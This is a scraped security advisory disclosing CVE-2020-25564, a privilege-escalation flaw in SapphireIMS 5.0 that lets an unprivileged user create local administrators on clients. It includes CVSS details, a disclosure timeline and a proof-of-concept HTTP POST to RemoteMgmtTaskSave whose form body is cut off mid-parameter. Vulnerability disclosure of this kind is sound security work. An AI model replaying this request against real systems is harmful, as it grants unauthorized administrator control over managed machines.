[CVE-2020-25564] SapphireIMS: Unprivileged user remote command execution (create local admin on clients)
Posted on
Sep 19, 2020
Description In SapphireIMS 5.0, it is possible to create local administrator on any client with credentials of a non-privileged user by directly accessing RemoteMgmtTaskSave
(Automation Tasks) feature.
CVSS 3.0 Base Score 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
Researcher Tanoy Bose
POC 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1 Host: 192.168.191.48 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1619 Origin: http://192.168.191.48 Connection: close Referer: http://192.168.191.48/SapphireIMS/TaskConfiguration.jsp?jobTypeId=2017&TaskName=User%20Management&SubTaskName=User%20Account%20Creation&Taskid=1002&mainmenu=yes&SelectedSite=1 Cookie: JSESSIONID=Ni+9V4wVLLkXCe5J0mirr2P4 Upgrade-Insecure-Requests: 1 applicationLogoutTypeOldUI=0&nodupSite=1&mainMenuID=yes&WMIIndex=0&WMITabName=WMI¶mReq1=1&TabList=1&JobIDList=10005&IsparamRequired=1&JobID=10005&TabList=Scheduler&SNMPShowHosts=0&WMIShowHosts=1&WBEMShowHosts=0&SSHShowHosts=0&SelectedSite=1&SelectedTabList=1%2C10005%7C%26%26%7C¶m_List=10005%2C1%240%2C1%241%7C%3D%
Vulnerability Tracker]
Disclosure timelines
07 May, 2020 - Vendor informed; failed
16 Sept, 2020 - Cert-CC and Cert-In Informed